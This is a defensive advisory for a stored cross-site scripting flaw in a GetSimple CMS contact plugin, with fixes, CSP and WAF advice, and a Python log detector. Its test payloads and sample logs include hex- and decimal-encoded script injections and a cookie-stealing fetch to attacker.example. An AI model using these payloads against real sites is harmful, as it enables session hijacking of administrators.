CVE-2021-47870

5.4 MEDIUM

📋 TL;DR

Stored cross-site scripting in the GetSimple CMS My SMTP Contact Plugin (1.1.2 and earlier). An unauthenticated visitor submits the public contact form with a payload whose special characters are hex-encoded; the plugin's htmlspecialchars() filtering does not neutralize that encoded form, so the submission is stored with the script intact and executes in the browser of any administrator who views it in the admin panel. Every site running the vulnerable plugin version is affected, since the attacker needs no account.

💻 Affected Systems

Products:
  • GetSimple CMS My SMTP Contact Plugin
Versions: 1.1.2 and earlier
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires administrator to view malicious content; plugin must be installed and active.

📦 What is this software?

GetSimple CMS is a lightweight PHP content management system that stores its data in flat XML files rather than a database. My SMTP Contact is a third-party plugin that adds a contact form to the site and delivers submissions by SMTP; submissions are also kept and displayed in the admin panel, which is the page in which the injected script runs.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Administrator account compromise leading to full CMS takeover (content, users, plugin installation), data theft, or server compromise if chained with another vulnerability such as a file-upload or plugin-install weakness.

🟠 Likely Case

Session hijacking or credential theft, and actions performed in the admin panel with the administrator's privileges while the admin views the malicious submission.

🟢 If Mitigated

With the patched plugin, correct output encoding, and a Content Security Policy that blocks inline scripts on admin pages, the stored payload renders as harmless text and has no impact.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Authentication Required: No (the payload is delivered through the public contact form)
User Interaction Required: Yes (an administrator must open the stored submission)
Complexity: LOW

The attacker submits malicious contact form data as an anonymous visitor; the script fires when an administrator views the submission in the admin panel.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1.3 or later

Vendor: https://github.com/GetSimpleCMS/GetSimpleCMS (core CMS repository; the plugin is distributed separately, so check the plugin's own release for the fix)

Restart Required: No

Instructions:

1. Update the plugin to version 1.1.3 or later via the GetSimple CMS admin panel (Plugins).
2. Verify that the update completed successfully and the reported plugin version is 1.1.3 or higher.
3. Clear the browser cache and test that the contact form still submits and delivers mail.

🔧 Temporary Workarounds

Disable vulnerable plugin (applies to: all)

Temporarily disable the My SMTP Contact Plugin until it is patched. Note that this removes the contact form from the site.

Navigate to GetSimple CMS admin > Plugins > Deactivate 'My SMTP Contact Plugin'

Implement Content Security Policy (applies to: all)

Add a CSP header that forbids inline script execution, so an injected payload cannot run even if it reaches the admin page. In .htaccess (requires mod_headers):

<IfModule mod_headers.c>
    Header always set Content-Security-Policy "default-src 'self'; script-src 'self'"
</IfModule>

Or set the equivalent header in the web server configuration. Caveats: the header must be served on the admin pages where stored submissions are rendered, not only on the public site; admin interfaces of this vintage commonly rely on inline scripts, so test the admin panel after enabling the policy. Adding 'unsafe-inline' to restore broken admin pages would defeat the purpose of the mitigation.

🧯 If You Can't Patch

  • Restrict administrator access to trusted networks only. This does not stop the script from running in the admin's browser, but it prevents an attacker outside that network from reusing a stolen session cookie directly.
  • Implement web application firewall rules to block XSS payloads on contact form submissions. The rules must decode numeric character references (hex &#x..; and decimal &#..;) before matching, since that encoding is exactly how this vulnerability bypasses the plugin's filter.

🔍 How to Verify

Check if Vulnerable:

Check plugin version in GetSimple CMS admin panel under Plugins > My SMTP Contact Plugin

Check Version:

Check the version shown in the GetSimple CMS admin interface, or the version string passed to register_plugin() in the plugin's PHP file in the plugins directory.

Verify Fix Applied:

Confirm the plugin version is 1.1.3 or higher, then submit the contact form with a plain payload (such as <script>alert(1)</script>) and with the same payload written as hex character references (&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;). In both cases the submission must appear in the admin panel as literal text, and no script may execute.

📡 Detection & Monitoring

Log Indicators:

  • Contact form submissions containing numeric character references (&#x..; or &#..;) or encoded tags, which have no place in a name, e-mail address or ordinary message
  • Administrator sessions used from an IP address or User-Agent that differs from the administrator's usual one, or admin actions (user, page or plugin changes) the administrator did not perform

Network Indicators:

  • POST requests to the contact form whose body contains numeric character references (seen URL-encoded as %26%23x for hex or %26%23 for decimal) or percent-encoded tags such as %3Cscript

SIEM Query:

source="web_logs" AND method="POST" AND uri="*contact*" AND ("%3Cscript" OR "%26%23x" OR "%26%23" OR "onerror%3D")

This query only works against a log source that records request bodies (a WAF, reverse proxy or ModSecurity audit log); standard web server access logs do not contain POST bodies. Filtering on status=200 adds nothing, because the form accepts a malicious submission exactly like a benign one.
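The following is an added example, not code from the page or from the plugin: a small detector that applies the indicators above to log lines, as a practitioner might run it offline or adapt it into a SIEM rule. It assumes a JSON-lines log with request bodies recorded (a WAF or proxy log; plain access logs lack bodies), a contact form at /index.php?id=contact, and constructed sample entries with example IPs and timestamps. It goes beyond the hex case in the text by repeatedly URL-decoding and entity-decoding each field so that decimal references and double-encoded payloads are caught too, and it includes a benign message containing a bare "<" to show the false positive being avoided.

```python
import html
import json
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log lines (JSON, one request per line) as a WAF, reverse proxy
# or ModSecurity audit log might record them, including the POST body. Plain Apache
# access logs do not contain request bodies, so this detection needs such a source.
# The form path /index.php?id=contact and all IPs and timestamps are assumptions.
SAMPLE_LOGS = [
    '{"ts":"2021-06-01T10:00:01Z","ip":"203.0.113.5","method":"POST","path":"/index.php?id=contact",'
    '"status":200,"body":"name=Alice&email=alice%40example.com&message=Hello%2C+is+the+shop+open%3F"}',
    # hex numeric character references: &#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;, URL-encoded
    '{"ts":"2021-06-01T10:02:13Z","ip":"198.51.100.7","method":"POST","path":"/index.php?id=contact",'
    '"status":200,"body":"name=%26%23x3c%3Bscript%26%23x3e%3Balert(1)%26%23x3c%3B%2Fscript%26%23x3e%3B'
    '&email=x%40example.com&message=hi"}',
    # plain <script> tag, only URL-encoded
    '{"ts":"2021-06-01T10:05:44Z","ip":"198.51.100.7","method":"POST","path":"/index.php?id=contact",'
    '"status":200,"body":"name=Bob&email=bob%40example.com&message=%3Cscript%3Efetch(%22https%3A%2F%2F'
    'attacker.example%2F%3Fc%3D%22%2Bdocument.cookie)%3C%2Fscript%3E"}',
    # benign text containing a bare "<": must not be flagged
    '{"ts":"2021-06-01T10:07:00Z","ip":"192.0.2.9","method":"POST","path":"/index.php?id=contact",'
    '"status":200,"body":"name=Carol&email=carol%40example.com&message=Price+for+%3C100+units%3F"}',
    # decimal numeric character references around an event-handler payload
    '{"ts":"2021-06-01T10:09:30Z","ip":"198.51.100.7","method":"POST","path":"/index.php?id=contact",'
    '"status":200,"body":"name=%26%2360%3Bimg+src%3Dx+onerror%3Dalert(1)%26%2362%3B'
    '&email=x%40example.com&message=hi"}',
]

# A numeric character reference, hex (&#x3c;) or decimal (&#60;), in the raw field value.
NUMERIC_CHAR_REF = re.compile(r"&#(?:x[0-9a-f]+|[0-9]+);?", re.I)

# Indicators matched against the fully decoded, lower-cased value.
XSS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b")),
    ("event-handler", re.compile(r"\bon(?:error|load|mouseover|focus|click|toggle)\s*=")),
    ("javascript-uri", re.compile(r"javascript\s*:")),
    ("markup-tag", re.compile(r"<\s*(?:img|svg|iframe|object|embed|math|details)\b")),
]


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode and HTML-entity-decode repeatedly until the value stops changing.

    This collapses the encodings an attacker can stack (percent-encoding on the wire,
    numeric character references to slip past a naive filter) into the text a browser
    would finally interpret. The pass count is bounded so hostile input cannot loop.
    """
    current = value
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


def classify(raw_value: str) -> list[str]:
    """Return the names of all indicators that fire for one submitted field value."""
    indicators = []
    if NUMERIC_CHAR_REF.search(raw_value):
        indicators.append("numeric-char-ref")
    decoded = normalize(raw_value)
    for name, pattern in XSS_PATTERNS:
        if pattern.search(decoded):
            indicators.append(name)
    return indicators


def scan_log_lines(lines, form_path: str = "/index.php?id=contact") -> list[dict]:
    """Flag contact-form POSTs whose fields carry an XSS indicator."""
    findings = []
    for line in lines:
        entry = json.loads(line)
        if entry.get("method") != "POST" or form_path not in entry.get("path", ""):
            continue
        # parse_qs performs the first URL-decode; normalize() handles any further layers.
        for field, values in parse_qs(entry.get("body", ""), keep_blank_values=True).items():
            for value in values:
                indicators = classify(value)
                if indicators:
                    findings.append({"ts": entry["ts"], "ip": entry["ip"],
                                     "field": field, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOGS):
        print(f'{finding["ts"]} {finding["ip"]} field={finding["field"]} '
              f'indicators={",".join(finding["indicators"])}')
```

Run against the constructed sample, the script reports the hex-encoded script tag, the plain script tag and the decimal-encoded onerror payload, and stays silent on Alice's and Carol's messages. The "numeric-char-ref" indicator on its own is a strong signal for this particular bug, because a genuine visitor has no reason to type character references into a name field.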
